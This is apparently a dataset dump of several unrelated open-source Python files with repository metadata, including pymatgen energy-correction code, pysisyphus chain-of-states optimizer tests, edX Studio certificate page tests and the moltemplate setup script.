def graph_residual_error_per_species(self, specie: str) -> go.Figure:
"""
Graphs the residual errors for each compound that contains specie after applying computed corrections.
Args:
specie: the specie/group that residual errors are being plotted for
Raises:
ValueError: the specie is not a valid specie that this class fits corrections for
"""
if specie not in self.species:
raise ValueError("not a valid specie")
if len(self.corrections) == 0:
raise RuntimeError("Please call compute_corrections or compute_from_files to calculate corrections first")
abs_errors = [abs(i) for i in self.diffs - np.dot(self.coeff_mat, self.corrections)]
labels_species = self.names.copy()
diffs_cpy = self.diffs.copy()
num = len(labels_species)
if specie in ("oxide", "peroxide", "superoxide", "S"):
if specie == "oxide":
compounds = self.oxides
elif specie == "peroxide":
compounds = self.peroxides
elif specie == "superoxides":
compounds = self.superoxides
else:
compounds = self.sulfides
for i in range(num):
if labels_species[num - i - 1] not in compounds:
del labels_species[num - i - 1]
del abs_errors[num - i - 1]
del diffs_cpy[num - i - 1]
else:
for i in range(num):
if not Composition(labels_species[num - i - 1])[specie]:
del labels_species[num - i - 1]
del abs_errors[num - i - 1]
del diffs_cpy[num - i - 1]
abs_errors, labels_species = (list(t) for t in zip(*sorted(zip(abs_errors, labels_species)))) # sort by error
num = len(abs_errors)
fig = go.Figure(
data=go.Scatter(
x=np.linspace(1, num, num),
y=abs_errors,
mode="markers",
text=labels_species,
),
layout=go.Layout(
title=go.layout.Title(text="Residual Errors for " + specie),
yaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text="Residual Error (eV/atom)")),
),
)
print("Residual Error:")
print("Median = " + str(np.median(np.array(abs_errors))))
print("Mean = " + str(np.mean(np.array(abs_errors))))
print("Std Dev = " + str(np.std(np.array(abs_errors))))
print("Original Error:")
print("Median = " + str(abs(np.median(np.array(diffs_cpy)))))
print("Mean = " + str(abs(np.mean(np.array(diffs_cpy)))))
print("Std Dev = " + str(np.std(np.array(diffs_cpy))))
return fig
def make_yaml(self, name: str = "MP2020", dir: Optional[str] = None) -> None:
"""
Creates the _name_Compatibility.yaml that stores corrections as well as _name_CompatibilityUncertainties.yaml
for correction uncertainties.
Args:
name: str, alternate name for the created .yaml file.
Default: "MP2020"
dir: str, directory in which to save the file. Pass None (default) to
save the file in the current working directory.
"""
if len(self.corrections) == 0:
raise RuntimeError("Please call compute_corrections or compute_from_files to calculate corrections first")
# elements with U values
ggaucorrection_species = ["V", "Cr", "Mn", "Fe", "Co", "Ni", "W", "Mo"]
comp_corr: "OrderedDict[str, float]" = OrderedDict()
o: "OrderedDict[str, float]" = OrderedDict()
f: "OrderedDict[str, float]" = OrderedDict()
comp_corr_error: "OrderedDict[str, float]" = OrderedDict()
o_error: "OrderedDict[str, float]" = OrderedDict()
f_error: "OrderedDict[str, float]" = OrderedDict()
for specie in list(self.species) + ["ozonide"]:
if specie in ggaucorrection_species:
o[specie] = self.corrections_dict[specie][0]
f[specie] = self.corrections_dict[specie][0]
o_error[specie] = self.corrections_dict[specie][1]
f_error[specie] = self.corrections_dict[specie][1]
else:
comp_corr[specie] = self.corrections_dict[specie][0]
comp_corr_error[specie] = self.corrections_dict[specie][1]
outline = """\
Name:
Corrections:
GGAUMixingCorrections:
O:
F:
CompositionCorrections:
Uncertainties:
GGAUMixingCorrections:
O:
F:
CompositionCorrections:
"""
fn = name + "Compatibility.yaml"
if dir:
path = os.path.join(dir, fn)
else:
path = fn
yml = yaml.YAML()
yml.Representer.add_representer(OrderedDict, yml.Representer.represent_dict)
yml.default_flow_style = False
contents = yml.load(outline)
contents["Name"] = name
# make CommentedMap so comments can be added
contents["Corrections"]["GGAUMixingCorrections"]["O"] = yaml.comments.CommentedMap(o)
contents["Corrections"]["GGAUMixingCorrections"]["F"] = yaml.comments.CommentedMap(f)
contents["Corrections"]["CompositionCorrections"] = yaml.comments.CommentedMap(comp_corr)
contents["Uncertainties"]["GGAUMixingCorrections"]["O"] = yaml.comments.CommentedMap(o_error)
contents["Uncertainties"]["GGAUMixingCorrections"]["F"] = yaml.comments.CommentedMap(f_error)
contents["Uncertainties"]["CompositionCorrections"] = yaml.comments.CommentedMap(comp_corr_error)
contents["Corrections"].yaml_set_start_comment("Energy corrections in eV/atom", indent=2)
contents["Corrections"]["GGAUMixingCorrections"].yaml_set_start_comment(
"Composition-based corrections applied to transition metal oxides\nand fluorides to "
+ 'make GGA and GGA+U energies compatible\nwhen compat_type = "Advanced" (default)',
indent=4,
)
contents["Corrections"]["CompositionCorrections"].yaml_set_start_comment(
"Composition-based corrections applied to any compound containing\nthese species as anions",
indent=4,
)
contents["Uncertainties"].yaml_set_start_comment(
"Uncertainties corresponding to each energy correction (eV/atom)", indent=2
)
with open(path, "w") as file:
yml.dump(contents, file)
|
gmatteo/pymatgen
|
pymatgen/entries/correction_calculator.py
|
Python
|
mit
| 20,772
|
[
"pymatgen"
] |
7afbfb7b4107558f50ac2635ad7d9177904f13b20c15c0d454271e135abd7797
|
from Inference import Inference
from Gaussian import Gaussian
|
aerialhedgehog/VyPy
|
trunk/VyPy/regression/gpr/inference/__init__.py
|
Python
|
bsd-3-clause
| 63
|
[
"Gaussian"
] |
cd7906a55cde184987b45bf9dd38fd0045c880deb16439ba44b312f703b7c95e
|
import matplotlib.pyplot as plt
import numpy as np
import pytest
from pysisyphus.calculators.AnaPot import AnaPot
from pysisyphus.calculators.MullerBrownSympyPot import MullerBrownPot
from pysisyphus.cos.NEB import NEB
from pysisyphus.cos.SimpleZTS import SimpleZTS
from pysisyphus.Geometry import Geometry
from pysisyphus.interpolate.Interpolator import Interpolator
from pysisyphus.optimizers.LBFGS import LBFGS
from pysisyphus.optimizers.ConjugateGradient import ConjugateGradient
from pysisyphus.optimizers.QuickMin import QuickMin
from pysisyphus.optimizers.FIRE import FIRE
from pysisyphus.optimizers.SteepestDescent import SteepestDescent
from pysisyphus.optimizers.RFOptimizer import RFOptimizer
from pysisyphus.plotters.AnimPlot import AnimPlot
from pysisyphus.run import run_from_dict
from pysisyphus.testing import using
def get_geoms():
initial = AnaPot.get_geom((-1.05274, 1.02776, 0))
final = AnaPot.get_geom((1.94101, 3.85427, 0))
geoms = (initial, final)
return geoms
def run_cos_opt(geoms, between, calc_cls,
cos_cls, cos_kwargs,
opt_cls, opt_kwargs):
interpol = Interpolator(geoms, between=between)
images = interpol.interpolate_all()
for image in images:
image.set_calculator(AnaPot())
cos = cos_cls(images, **cos_kwargs)
opt = opt_cls(cos, **opt_kwargs)
opt.run()
return opt
def assert_cos_opt(opt, ref_cycle):
assert opt.is_converged
assert opt.cur_cycle == ref_cycle
@pytest.mark.parametrize(
"opt_cls, opt_kwargs_, neb_kwargs_, ref_cycle, between",
[
(SteepestDescent, {}, {}, 30, 5),
(SteepestDescent, {}, {}, 32, 10),
(ConjugateGradient, {}, {}, 44, 5),
(QuickMin, {"dt": 0.1,}, {}, 27, 5),
(FIRE, {"dt_max": 0.2,}, {}, 42, 5),
(LBFGS, {"gamma_mult": True, }, {}, 12, 5),
])
def test_anapot_neb(opt_cls, opt_kwargs_, neb_kwargs_, ref_cycle, between):
geoms = get_geoms()
neb_kwargs = {
"fix_ends": True,
"k_min": 0.01,
}
neb_kwargs.update(neb_kwargs_)
opt_kwargs = {
}
opt_kwargs.update(opt_kwargs_)
opt = run_cos_opt(geoms, between, AnaPot,
NEB, neb_kwargs,
opt_cls, opt_kwargs)
# ap = animate(opt)
# plt.show()
assert_cos_opt(opt, ref_cycle)
@pytest.mark.parametrize(
"between, param, ref_cycle",
[
(5, "equal", 49),
(10, "equal", 49),
(5, "energy", 41),
(10, "energy", 46),
])
def test_anapot_szts(between, param, ref_cycle):
geoms = get_geoms()
szts_kwargs = {
"fix_ends": True,
"param": param,
}
opt_cls = SteepestDescent
opt_kwargs = {
"max_cycles": 100,
}
opt = run_cos_opt(geoms, between, AnaPot,
SimpleZTS, szts_kwargs,
SteepestDescent, opt_kwargs)
# ap = animate(opt)
# plt.show()
assert_cos_opt(opt, ref_cycle)
def animate(opt):
xlim = (-2, 2.5)
ylim = (0, 5)
levels = (-3, 4, 80)
ap = AnimPlot(AnaPot(), opt, xlim=xlim, ylim=ylim, levels=levels)
ap.animate()
return ap
def animate_bare(opt):
xlim = (-2, 2.5)
ylim = (0, 5)
levels = (-3, 4, 80)
ap = AnimPlot(AnaPot(), opt, xlim=xlim, ylim=ylim, levels=levels,
energy_profile=False, colorbar=False, figsize=(8, 6),
save=False, title=False,
)
ap.animate()
return ap
@using("pyscf")
def test_hcn_neb():
run_dict = {
"preopt": {
"max_cycles": 3,
},
"interpol": {
"type": "idpp",
"between": 3,
},
"cos": {
"type": "neb",
},
"opt": {
"type": "qm",
"align": True,
},
"calc": {
"type": "pyscf",
"pal": 2,
"basis": "321g",
},
"geom": {
"type": "cart",
"fn": ["lib:hcn.xyz", "lib:hcn_iso_ts.xyz", "lib:nhc.xyz"],
},
}
results = run_from_dict(run_dict)
assert results.cos_opt.is_converged
assert results.cos_opt.cur_cycle == 18
@pytest.mark.parametrize(
"neb_kwargs, ref_cycle", [
({}, 34),
({"variable_springs": True, "k_min": 0.01, "k_max": 5}, 33),
]
)
def test_neb_springs(neb_kwargs, ref_cycle):
calc = AnaPot()
geoms = calc.get_path(15)
neb = NEB(geoms, **neb_kwargs)
opt = SteepestDescent(neb)
opt.run()
# calc.anim_opt(opt, show=True)
assert(opt.is_converged)
assert(opt.cur_cycle == ref_cycle)
@pytest.mark.parametrize(
"k, ref_cycle", [
( 500, 70),
( 1000, 56),
( 2000, 62),
( 4000, 78),
]
)
def test_mullerbrown_neb(k, ref_cycle):
geoms = MullerBrownPot().get_path(num=17)
cos = NEB(geoms, k_max=k, k_min=k)
opt_kwargs = {
"max_step": 0.04,
"gamma_mult": True,
"keep_last": 10,
"max_cycles": 100,
}
opt = LBFGS(cos, **opt_kwargs)
opt.run()
assert opt.is_converged
assert opt.cur_cycle == ref_cycle
# calc = MullerBrownPot()
# calc.anim_opt(opt, show=True)
|
eljost/pysisyphus
|
tests/test_cos/test_cos.py
|
Python
|
gpl-3.0
| 5,184
|
[
"PySCF"
] |
8201d5d06ac110dab3fb3e5aec50f6c3d736863488a980a4611e686d82b138ac
|
"""
Acceptance tests for Studio's Setting pages
"""
import re
from .base_studio_test import StudioCourseTest
from ...pages.studio.settings_certificates import CertificatesPage
class CertificatesTest(StudioCourseTest):
"""
Tests for settings/certificates Page.
"""
def setUp(self): # pylint: disable=arguments-differ
super(CertificatesTest, self).setUp(is_staff=True)
self.certificates_page = CertificatesPage(
self.browser,
self.course_info['org'],
self.course_info['number'],
self.course_info['run']
)
def make_signatory_data(self, prefix='First'):
"""
Makes signatory dict which can be used in the tests to create certificates
"""
return {
'name': '{prefix} Signatory Name'.format(prefix=prefix),
'title': '{prefix} Signatory Title'.format(prefix=prefix),
'organization': '{prefix} Signatory Organization'.format(prefix=prefix),
}
def create_and_verify_certificate(self, course_title_override, existing_certs, signatories):
"""
Creates a new certificate and verifies that it was properly created.
"""
self.assertEqual(existing_certs, len(self.certificates_page.certificates))
if existing_certs == 0:
self.certificates_page.wait_for_first_certificate_button()
self.certificates_page.click_first_certificate_button()
else:
self.certificates_page.wait_for_add_certificate_button()
self.certificates_page.click_add_certificate_button()
certificate = self.certificates_page.certificates[existing_certs]
# Set the certificate properties
certificate.course_title = course_title_override
# add signatories
added_signatories = 0
for idx, signatory in enumerate(signatories):
certificate.signatories[idx].name = signatory['name']
certificate.signatories[idx].title = signatory['title']
certificate.signatories[idx].organization = signatory['organization']
certificate.signatories[idx].upload_signature_image('Signature-{}.png'.format(idx))
added_signatories += 1
if len(signatories) > added_signatories:
certificate.click_add_signatory_button()
# Save the certificate
self.assertEqual(certificate.get_text('.action-primary'), "Create")
certificate.click_create_certificate_button()
self.assertIn(course_title_override, certificate.course_title)
return certificate
def test_no_certificates_by_default(self):
"""
Scenario: Ensure that message telling me to create a new certificate is
shown when no certificate exist.
Given I have a course without certificates
When I go to the Certificates page in Studio
Then I see "You have not created any certificates yet." message and
a link with text "Set up your certificate"
"""
self.certificates_page.visit()
self.assertTrue(self.certificates_page.no_certificates_message_shown)
self.assertIn(
"You have not created any certificates yet.",
self.certificates_page.no_certificates_message_text
)
self.assertIn(
"Set up your certificate",
self.certificates_page.new_certificate_link_text
)
def test_can_create_and_edit_certficate(self):
"""
Scenario: Ensure that the certificates can be created and edited correctly.
Given I have a course without certificates
When I click button 'Add your first Certificate'
And I set new the course title override and signatory and click the button 'Create'
Then I see the new certificate is added and has correct data
When I edit the certificate
And I change the name and click the button 'Save'
Then I see the certificate is saved successfully and has the new name
"""
self.certificates_page.visit()
self.certificates_page.wait_for_first_certificate_button()
certificate = self.create_and_verify_certificate(
"Course Title Override",
0,
[self.make_signatory_data('first'), self.make_signatory_data('second')]
)
# Edit the certificate
certificate.click_edit_certificate_button()
certificate.course_title = "Updated Course Title Override 2"
self.assertEqual(certificate.get_text('.action-primary'), "Save")
certificate.click_save_certificate_button()
self.assertIn("Updated Course Title Override 2", certificate.course_title)
def test_can_delete_certificate(self):
"""
Scenario: Ensure that the user can delete certificate.
Given I have a course with 1 certificate
And I go to the Certificates page
When I delete the Certificate with name "New Certificate"
Then I see that there is no certificate
When I refresh the page
Then I see that the certificate has been deleted
"""
self.certificates_page.visit()
certificate = self.create_and_verify_certificate(
"Course Title Override",
0,
[self.make_signatory_data('first'), self.make_signatory_data('second')]
)
certificate.wait_for_certificate_delete_button()
self.assertEqual(len(self.certificates_page.certificates), 1)
# Delete the certificate we just created
certificate.click_delete_certificate_button()
self.certificates_page.click_confirmation_prompt_primary_button()
# Reload the page and confirm there are no certificates
self.certificates_page.visit()
self.assertEqual(len(self.certificates_page.certificates), 0)
def test_can_create_and_edit_signatories_of_certficate(self):
"""
Scenario: Ensure that the certificates can be created with signatories and edited correctly.
Given I have a course without certificates
When I click button 'Add your first Certificate'
And I set new the course title override and signatory and click the button 'Create'
Then I see the new certificate is added and has one signatory inside it
When I click 'Edit' button of signatory panel
And I set the name and click the button 'Save' icon
Then I see the signatory name updated with newly set name
When I refresh the certificates page
Then I can see course has one certificate with new signatory name
When I click 'Edit' button of signatory panel
And click on 'Close' button
Then I can see no change in signatory detail
"""
self.certificates_page.visit()
certificate = self.create_and_verify_certificate(
"Course Title Override",
0,
[self.make_signatory_data('first')]
)
self.assertEqual(len(self.certificates_page.certificates), 1)
# Edit the signatory in certificate
signatory = certificate.signatories[0]
signatory.edit()
signatory.name = 'Updated signatory name'
signatory.title = 'Update signatory title'
signatory.organization = 'Updated signatory organization'
signatory.save()
self.assertEqual(len(self.certificates_page.certificates), 1)
#Refreshing the page, So page have the updated certificate object.
self.certificates_page.refresh()
signatory = self.certificates_page.certificates[0].signatories[0]
self.assertIn("Updated signatory name", signatory.name)
self.assertIn("Update signatory title", signatory.title)
self.assertIn("Updated signatory organization", signatory.organization)
signatory.edit()
signatory.close()
self.assertIn("Updated signatory name", signatory.name)
def test_can_cancel_creation_of_certificate(self):
"""
Scenario: Ensure that creation of a certificate can be canceled correctly.
Given I have a course without certificates
When I click button 'Add your first Certificate'
And I set name of certificate and click the button 'Cancel'
Then I see that there is no certificates in the course
"""
self.certificates_page.visit()
self.certificates_page.click_first_certificate_button()
certificate = self.certificates_page.certificates[0]
certificate.course_title = "Title Override"
certificate.click_cancel_edit_certificate()
self.assertEqual(len(self.certificates_page.certificates), 0)
def test_line_breaks_in_signatory_title(self):
"""
Scenario: Ensure that line breaks are properly reflected in certificate
Given I have a certificate with signatories
When I add signatory title with new line character
Then I see line break in certificate title
"""
self.certificates_page.visit()
certificate = self.create_and_verify_certificate(
"Course Title Override",
0,
[
{
'name': 'Signatory Name',
'title': 'Signatory title with new line character \n',
'organization': 'Signatory Organization',
}
]
)
certificate.wait_for_certificate_delete_button()
# Make sure certificate is created
self.assertEqual(len(self.certificates_page.certificates), 1)
signatory_title = self.certificates_page.get_first_signatory_title()
self.assertNotEqual([], re.findall(r'<br\s*/?>', signatory_title))
|
vikas1885/test1
|
common/test/acceptance/tests/studio/test_studio_settings_certificates.py
|
Python
|
agpl-3.0
| 9,745
|
[
"VisIt"
] |
d600d27d01125328b1a67db5d5efec2037e044962be24702c183175d9fac6094
|
from setuptools import setup
setup(
name='moltemplate',
packages=['moltemplate',
'moltemplate.nbody_alt_symmetry'],
package_dir={'moltemplate': 'moltemplate'}, #.py files are in "moltemplate/"
package_data={'moltemplate': ['force_fields/*.lt']}, #.lt files are in "moltemplate/force_fields/"
#package_data={'moltemplate/force_fields':['*.lt']}
#
#package_data={'moltemplate/force_fields':
# ['compass_published.lt',
# 'cooke_deserno_lipid.lt',
# 'gaff2.lt',
# 'gaff.lt',
# 'graphene.lt',
# 'graphite.lt',
# 'loplsaa.lt',
# 'martini.lt',
# 'oplsaa.lt',
# 'sdk.lt',
# 'spce_ice_rect16.lt',
# 'spce_ice_rect32.lt',
# 'spce_ice_rect8.lt',
# 'spce.lt',
# 'tip3p_1983_charmm.lt',
# 'tip3p_1983.lt',
# 'tip3p_2004.lt',
# 'tip5p.lt',
# 'trappe1998.lt',
# 'watmw.lt']},
description='A general cross-platform text-based molecule builder for LAMMPS',
long_description='Moltemplate is a general cross-platform text-based molecule builder for LAMMPS and ESPResSo. Moltemplate was intended for building custom coarse-grained molecular models, but it can be used to prepare realistic all-atom simulations as well. It supports a variety of force fields for all-atom and coarse-grained modeling (including many-body forces and non-point-like particles). New force fields and examples are added continually by users. NOTE: Downloading moltemplate from pypi using PIP will omit all examples and documentation. Examples and documentation are available at https://moltemplate.org and https://github.com/jewettaij/moltemplate.',
author='Andrew Jewett',
author_email='jewett.aij@gmail.com',
url='https://github.com/jewettaij/moltemplate',
download_url='https://github.com/jewettaij/moltemplate/archive/v2.20.3.zip',
version='2.20.3',
keywords=['simulation', 'LAMMPS', 'molecule editor', 'molecule builder',
'ESPResSo'],
license='MIT',
classifiers=['Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX :: Linux',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Unix Shell',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Scientific/Engineering :: Physics',
'Topic :: Multimedia :: Graphics :: 3D Modeling',
'Intended Audience :: Science/Research'],
scripts=['moltemplate/scripts/moltemplate.sh',
'moltemplate/scripts/cleanup_moltemplate.sh',
'moltemplate/scripts/molc.sh',
'moltemplate/scripts/pdb2crds.awk',
'moltemplate/scripts/emoltemplate.sh'],
entry_points={
'console_scripts': [
'ttree.py=moltemplate.ttree:main',
'ttree_render.py=moltemplate.ttree_render:main',
'bonds_by_type.py=moltemplate.bonds_by_type:main',
'charge_by_bond.py=moltemplate.charge_by_bond:main',
'dump2data.py=moltemplate.dump2data:main',
'extract_espresso_atom_types.py=moltemplate.extract_espresso_atom_types:main',
'extract_lammps_data.py=moltemplate.extract_lammps_data:main',
'ettree.py=moltemplate.ettree:main',
'genpoly_lt.py=moltemplate.genpoly_lt:main',
'genpoly_modify_lt.py=moltemplate.genpoly_modify_lt:main',
'interpolate_curve.py=moltemplate.interpolate_curve:main',
'ltemplify.py=moltemplate.ltemplify:main',
'lttree.py=moltemplate.lttree:main',
'lttree_check.py=moltemplate.lttree_check:main',
'lttree_postprocess.py=moltemplate.lttree_postprocess:main',
'nbody_by_type.py=moltemplate.nbody_by_type:main',
'nbody_fix_ttree_assignments.py=moltemplate.nbody_fix_ttree_assignments:main',
'nbody_reorder_atoms.py=moltemplate.nbody_reorder_atoms:main',
'pdbsort.py=moltemplate.pdbsort:main',
'postprocess_input_script.py=moltemplate.postprocess_input_script:main',
'postprocess_coeffs.py=moltemplate.postprocess_coeffs:main',
'raw2data.py=moltemplate.raw2data:main',
'recenter_coords.py=moltemplate.recenter_coords:main',
'remove_duplicate_atoms.py=moltemplate.remove_duplicate_atoms:main',
'remove_duplicates_nbody.py=moltemplate.remove_duplicates_nbody:main',
'renumber_DATA_first_column.py=moltemplate.renumber_DATA_first_column:main']},
install_requires=[
'numpy',
],
zip_safe=True,
include_package_data=True
)
|
jewettaij/moltemplate
|
setup.py
|
Python
|
mit
| 4,930
|
[
"ESPResSo",
"LAMMPS"
] |
5decf54ca8bc37ba19ab6e57ed88178f8c72d9b505feadbe58339ee20c54f190
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.